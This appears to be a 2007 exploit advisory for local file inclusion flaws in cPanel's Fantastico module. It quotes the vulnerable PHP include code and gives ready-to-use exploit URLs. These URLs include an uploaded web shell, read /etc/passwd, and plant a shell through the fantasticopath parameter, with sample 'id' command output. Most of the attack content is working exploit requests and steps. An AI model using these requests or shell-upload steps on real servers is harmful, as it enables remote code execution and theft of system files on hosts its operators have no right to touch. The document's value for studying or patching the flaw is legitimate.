1 ##############################################################
2 Fantastico In all Version Cpanel 10.x <= local File Include
3
4 ##############################################################to the
5 Note : Preparations php.ini in Cpanel hypothetical and They also in
6 all WebServer
7
8 Must provide username And pass and login :2082
9 To break the strongest protection mod_security & safe_mode:On &
10 Disable functions : All NONE
11
12
13
14 Vulnerable Code ( 1 ) :
15 if(is_file($userlanguage))
16 {
17 include ( $userlanguage );
18
19 In
20
21 http://xx.com:2082/frontend/x/fantastico/includes/load_language.php
22
23
24
25 Exploit 1 :
26 http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/home/user/shell.php
27
28 id
29 uid=32170(user) gid=32170(user) groups=32170(user)
30
31 Exploit 2 :
32 http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd
33
34 ###################################################
35 Vulnerable Code ( 2 ) :
36
37 $localmysqlconfig=$fantasticopath . "/includes/mysqlconfig.local.php";
38 if (is_file($localmysqlconfig))
39 {
40 include($localmysqlconfig);
41
42 in
43 http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php
44 And also many of the files of the program
45
46 Exploit :
47 First Create directory Let the name (/includes/)
48 and upload Shell.php in (/includes/) Then rename
49 mysqlconfig.local.php D:
50
51 :::xploit::::
52 http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=/home/user/
Page 1/2
cPanel 10.9.x fantastico Local File Inclusion Vulnerabilities
cyb3rt & 020
03/11/2007
53
54
55
56 ###################################################
57
58
59 Discoverd By : cyb3rt & 020
60 ###################################################
61
62 Special Greetings :_ Tryag−Team & 4lKaSrGoLd3n−Team
63 ###################################################
64
65 # milw0rm.com [2007−03−11]
Page 2/2
cPanel 10.9.x fantastico Local File Inclusion Vul